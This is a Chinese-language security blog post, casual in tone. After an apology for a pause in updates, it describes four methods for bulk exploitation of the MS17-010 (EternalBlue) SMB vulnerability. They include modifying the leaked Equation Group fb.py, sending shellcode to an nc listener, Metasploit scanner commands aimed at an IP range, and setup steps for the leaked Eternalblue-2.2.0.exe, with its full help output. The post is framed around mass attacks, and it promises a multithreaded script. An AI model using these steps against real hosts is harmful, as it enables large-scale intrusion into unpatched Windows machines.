已经半个月没有更新了,放心朋友们,你们的晨星先生不是进局子了,而是现实中碰到了点问题。唉,搞安全人的宿命呀。那天晴姑娘跑来问我怎么没有更新,而那时候微信已经卸载了,和她通电话后了解到什么叫解放以及体会到读书使我快乐... 一周看似短短的,然而我已经错过了好多东西.... 首先那天Equation Group泄露的黑客武器出来,跟进复现了一波,结果就交给了同事们和团队的同学们了。本来想 搞个批量的,后面拖到了现在... 其次也没有帮东"棒打安全狗",最后微信取消了IOS客户端的赞赏了,也就是说有人收不到我的赞赏了 : ( 我也收不到部分人的赞赏了~
为了恢复一下更新的节奏,晚上先更新一些简单的东西吧 。
首先是色楠同学的投稿,我一直逼着他写,哈哈。写东西写笔记才会有成长,当然最重要的是实战。
他的文章就是下面那一篇!
首先想说的就是MS17-010这个漏洞的批量利用,看到有孩子们一步一步的利用真是蛋疼...就和大家介绍下批量的方法~
方法一:利用已有的fb.py 改装,将交互的参数写死补上。
自己脑补
方法二:用nc -v -L -p xxx ,这是CC牛的方法,然后发送
shellcode(shellcode余弦博客发的那个脚本貌似有提取出来),这个可以不用msf。
方法三:用msf批量这个算是比较简单的吧,感觉扫描内网这个比较容易。
ruby的脚本在这里:
https://github.com/rapid7/metasploit-framework/blob/942959f7e8b3dee0031726d166002acae115694e/modules/auxiliary/scanner/smb/smb_ms17_010.rb
下载下来之后smb-17-010.rb拷贝到 /usr/share/metasploit-framework/modules/auxiliary/scanner/smb目录下。
理论上内外网都能扫描。
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 60.xxx.109.1-60.xxx.109.255
set rport 445
run
方法四:把工具包里\lib\x86-Windows目录下的dll文件拷贝到\windows\specials目录下,然后把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml,
然后就可以在CMD下运行Eternalblue-2.2.0了。
C:\ccsec\ms17-010>Eternalblue-2.2.0.exe –help Eternalblue 2.2.0 Usage: Eternalblue-2.2.0.exe Options: –NetworkTimeout S16 (default: 60) Timeout for blocking network calls (in seconds). Use -1 for no timeout. –TargetIp IPv4 Target IP Address –TargetPort TcpPort (default: 445) Port used by the SMB service for exploit connection –VerifyTarget Boolean (default: true) Validate the SMB string from target against the target selected before exp loitation. –VerifyBackdoor Boolean (default: true) Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts. –MaxExploitAttempts U32 (default: 3) Number of times to attempt the exploit and groom. Disabled for XP/2K3. –GroomAllocations U32 (default: 12) Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3 ) to do. [–LogFile String] Where to write log file –OutConfig String (default: stdout) Where to write output parameters file –ValidateOnly Boolean (default: false) Stop execution after parameter validation –Target Choice Operating System, Service Pack, and Architecture of target OS XP Windows XP 32-Bit All Service Packs WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs C:\ccsec\ms17-010>
然后批量?python的popen操作exe就不用我多说了吧,哈哈...CY表弟写了一个脚本,我改改加个多线程,过几天发吧。